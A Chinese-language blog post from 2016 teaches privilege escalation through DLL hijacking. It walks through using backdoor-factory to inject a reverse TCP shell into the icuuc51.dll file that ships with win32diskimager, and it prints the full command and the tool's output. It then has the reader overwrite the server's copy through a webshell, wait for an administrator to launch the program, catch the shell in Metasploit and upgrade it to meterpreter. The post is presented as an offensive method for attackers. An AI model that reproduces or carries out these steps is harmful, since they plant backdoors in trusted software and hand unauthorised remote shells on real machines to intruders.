内容字号:默认大号超大号

段落设置:段首缩进取消段首缩进

字体设置:切换到微软雅黑切换到宋体

基于DLL劫持配合backdoor-factory的提权思路

2016-10-27 18:05 出处:清屏网 人气: 评论(0

0x00

网上有许多 DLL 劫持提权的文章 但是都不是很详细 而且 ws2.dll lpk.dll 一些以前的 dll 也已经被封锁了

自从 windows xp sp2 开始 就加入了这个机制

注册表路径:

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\SafeDllSearchMode

凡是里面存在的 dll 就必然是劫持不了的。

但是我们却可以注入应用程序中的 dll 来达到提权效果

就用 win32diskimager 这个软件来进行 dll 劫持的例子

0x01

首先用 process Explorer 这个软件来分析 win32diskimager 都调用了哪些 dll 文件

就用 icuuc51.dll这个来举例子 可以看到win32diskimager调用软件自带的dll

0x02

接着使用 backdoor-factory 来对这个 dll 进行注入后门

root@saya:~# backdoor-factory -f / file /icuuc51.dll -s reverse_shell_tcp_inline -P <your port>  -H <yoour ip>

接着选择 2 就完成了后门的生成

[!] Enter your selection: 2   

[!] Using selection: 2

[*] Changing flags for section: .data

[*] Patching initial entry instructions

[*] Creating win32 resume execution stub

[*] Looking for and setting selected shellcode

File icuuc51.dll is in the ‘backdoored’ directory

工具会提示一个存储的地方

0x03

假设我们在 webshell 提权的情况下 用菜刀把 icuuc51.dll 覆盖掉服务器软件原来的 icuuc51.dll

我这里搭建了一个简陋的 asp 环境

接着监听 msf

等待管理员打开被劫持的软件的 dll

当管理员打开软件之后 软件没有任何损坏

反其看 metasploit 这边已经获得了一个 shell

默认 backdoor-factory不是用meterpreter的载荷

用此命令将普通 shell提升为meterpreter

s essions -u <id>


分享给小伙伴们:
本文标签: 提权后门程序

相关文章

发表评论愿您的每句评论,都能给大家的生活添色彩,带来共鸣,带来思索,带来快乐。

CopyRight © 2015-2016 QingPingShan.com , All Rights Reserved.

清屏网 版权所有 豫ICP备15026204号